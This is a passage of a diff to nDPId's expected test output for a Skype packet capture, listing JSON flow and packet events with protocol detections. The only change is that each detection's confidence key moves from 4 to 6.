+00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuO\/8AAEARXS3AqAEinTeCkTLdAbsAGqTTnQwCwP4SRbwMfSMDCWlEQOP1"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuUbAAAEARRubAqAEiQTffJzLdAbsAGjQZnQ4ChKdksriBAZEnlRRV2r4X"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"} @@ -910,7 +910,7 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1431969717905,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969717905,"pkt":"PBXCt3IOxCwDBkn+CABFAADBmPEAAP8RfzrAqAFc4AAA+xTpFOkArRpOAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfcmZiwBgADAABBF9zbWLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwAzAMwAMAAEAAAwKABANTHVjYeKAmXMgaU1hY8Az"} @@ -931,34 +931,34 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAupZYAAEAR95jAqAEiTLnPDDLdsbUAGqRNnm8CZa4cvOCl2walp\/2oMJDI"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431969719055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431969719055,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAXoAAEAR9ajAqAEiwKgBAfP2ADUAQxAUbrQBAAABAAAAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAE="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431969719110,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1431969719110,"pkt":"PBXCt3IO0NQSxnP1CABFAAB3AABAAEARtwLAqAEBwKgBIgA18\/YAY7LlbrSBgAABAAIAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAHADAABAAEAAAAZAAQRrGQkwAwAAQABAAAAGQAEEaxkCA=="} -00816{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}} +00816{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"} -00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"} 